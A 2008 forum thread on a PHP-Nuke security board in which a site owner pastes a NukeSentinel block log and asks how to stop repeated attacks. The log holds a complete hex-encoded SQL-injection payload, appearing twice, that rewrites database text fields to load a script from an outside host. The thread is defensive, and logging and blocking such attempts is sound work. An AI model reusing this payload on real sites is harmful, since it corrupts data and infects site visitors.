Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

Being under attack
 View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Misha
Worker
Worker



Joined: Jul 30, 2006
Posts: 205
Location: McLean, VA
PostPosted: Mon Aug 25, 2008 10:25 am Reply with quote
For a last week or so I keep getting several messages daily from Nuke Sentinel, all looking like this (with different IPs of course Smile):

Code:
Created By: NukeSentinel(tm) 2.6.01


Date & Time: 2008-08-25 06:59:43 MDT GMT -0600


Blocked IP: 92.227.187.*


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


Referer: none


User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)


HTTP Host: [ Only registered users can see links on this board! Get registered or login! ]


Scr ipt Name: /index.php


Qu ery String: ;D ECLARE @S CHA R(4000);S ET @S=C AST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CH AR(4000));EXEC(@S);


Get String: ;DEC LARE_@S_CH AR(4000);SET_@S=CA ST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CH AR(4000));E XEC(@S);


Post St ring: Not Available


Forwarded For: none


Client IP: none


Remote Address: 92.227.187.23


Remote Port: 4063


Request Method: GE T


--------------------


Who-Is for IP
Is there anything else I can do stop it, other than just reading those notifications?

Of course there is always something of that kind happening time to time, but this time it seems to be pretty consistent and persistent, and I am kinda starting to worry that those guys finally manage to find a way in. I just got another notification, as I am typing this Sad

Thanks a bunch, Misha

_________________
http://www.funandsafedriving.com/defensive-driving.html 
View user's profile Send private message Visit poster's website
jakec
Site Admin



Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom
PostPosted: Mon Aug 25, 2008 10:39 am Reply with quote
See this post here: [ Only registered users can see links on this board! Get registered or login! ]
 
View user's profile Send private message
Misha
PostPosted: Mon Aug 25, 2008 10:45 am Reply with quote
Thanks Jake, this clears is up nicely Smile
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©